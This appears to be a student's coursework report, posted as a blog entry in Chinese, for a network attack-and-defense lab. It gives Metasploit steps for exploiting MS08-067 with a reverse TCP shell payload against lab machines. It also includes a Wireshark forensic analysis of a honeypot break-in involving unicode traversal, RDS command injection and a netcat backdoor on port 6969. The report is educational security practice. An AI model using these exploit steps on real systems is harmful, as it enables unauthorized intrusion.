luxy2121

导航

20252920 2025-20246-2 卢兴宇《网络攻防实践》实践6报告

20252920 2025-20246-2 《网络攻防实践》实践6报告

1.实践内容

(1)实践Metasploit windows attacker:使用windows Attacker/BT4攻击机尝试对windows Metasploitable靶机上的MS08-067漏洞进行远程渗透攻击,获取目标主机的访问权

(2)取证分析实践:解码一次成功的NT系统破解攻击。来自212.116.251.162的攻击者成功攻陷了一台由rfp部署的蜜罐主机172.16.1.106,(主机名为lab.wiretrip.net),要求提取并分析攻击的全部过程。

(3)团队对抗实践:攻方使用metasploit选择漏洞进行攻击,获得控制权。(要求写出攻击方的同学信息、使用漏洞、相关IP地址等);防守方使用wireshark监听获得的网络数据包,分析攻击过程,获取相关信息。

二、实践过程

(1)动手实践Metasploit windows attacker

任务:使用metasploit软件进行windows远程渗透统计实验

本次实验使用了kali(192.168.200.6)和WinXPattacker(192.168.200.7)
首先打开kali输入命令行msfconsole进入启动msfconsole
image

输入search ms08_067查看漏洞信息

image

输入命令进入漏洞所在文件use windows/smb/ms08_067_netapi

image

输入show options查看攻击此漏洞需要的设置

image

输入命令show payloads显示此漏洞的载荷

image

image

通过使用 set payload generic/shell_reverse_tcp命令设置攻击的载荷为tcp反向连接,然后,输入set LHOST 192.168.200.6、set RHOST 192.168.200.7
设置进行渗透攻击的主机为Kali,受到攻击的主机为Win2kServer
image

输入exploit,开始进行攻击

image

攻击成功后,就进入到了靶机的命令行界面,输入ipconfig/all查看靶机信息
image

(2)取证分析实践:解码一次成功的NT系统破解攻击。

实验目标:来自212.116.251.162的攻击者成功攻陷了一台由rfp部署的蜜罐主机172.16.1.106,(主机名为lab.wiretrip.net),要求提取并分析攻击的全部过程。
1、攻击者使用了什么破解工具进行攻击,现在学习通上下载文件共享到kali虚拟机上
image

将文件下载后用wireshark打开

image

将过滤条件设置为:ip.addr==172.16.1.106 and http
image

开始观察,发现第117行出现一个字符 %C0%AF,查看TCP流

image

特殊字符串%C0%AF是/的unicode编码,由此判断攻击者进行了unicode攻击并打开了boot.in文件

image

攻击者通过 msadcs.dll 中存在的RDS漏洞进行了SQL注入攻击,并执行了命令cmd /c echo werd >> c:\fun ,根据特征字符串 ADM!ROX!YOUR!WORLD ,可以查询到是由msadc(2).pl渗透攻击工具发起的攻击。

image

追踪数据流,这里表明攻击者利用ftp下载了nc.exe,pdump.exe,samdump.dll这三个文件

image

对 tcp.stream eq 109的数据流进行筛选,定位到第 1233 号数据包,并进行 TCP Stream 跟踪分析。

image

点进1233号包,发现攻击者进入了6969端口,将端口接收到的连接重定向给 cmd1.exe,从而建立远程交互式命令通道。

因此,攻击者先通过 Web 漏洞获得命令执行能力,再通过 nc.exe在靶机上建立后门监听,实现对目标系统的进一步控制。

image

设置过滤条件tcp.port == 6969,追踪数据流可以发现攻击机试图进入靶机但是失败

image

这里表示攻击者想通过net group查看组用户、net localgroup查看本地组用户、以及 net group domain admins查看管理员组,但都失败了。

image

(3)团队对抗实践:windows系统远程渗透攻击和分析

攻方使用metasploit选择漏洞进行攻击,获得控制权。(要求写出攻击方的同学信息、使用漏洞、相关IP地址等)
防守方使用wireshark监听获得的网络数据包,分析攻击过程,获取相关信息。

攻击机kali ip地址:172.20.10.4(卢兴宇)
靶机Win2k ip地址: 172.20.10.10(刘长天)

重复实验一操作

image

刘长天配置如下

image

先ping一下测试连通性

image

输入以下命令

image

image

image
image

然后在靶机出尝试创建文件

image

靶机成功收到

image

同学攻击我

image

在kali用wireshark监听成功

image

三、实验所遇到的问题及其解决方法

一开始未能正确配置靶机的ip地址,不在同一网段操作失败;

然后靶机也未打开桥接模式。

四、实践总结

这次试验我对Windows操作系统安全体系结构与机制有了更深刻的认识,通过实践我也了解到了Windows安全攻防技术,在NT分析时查阅了很多资料也学习到了很多漏洞攻击技术。

posted on 2026-04-20 22:23  20252920卢兴宇  阅读(26)  评论(0)    收藏  举报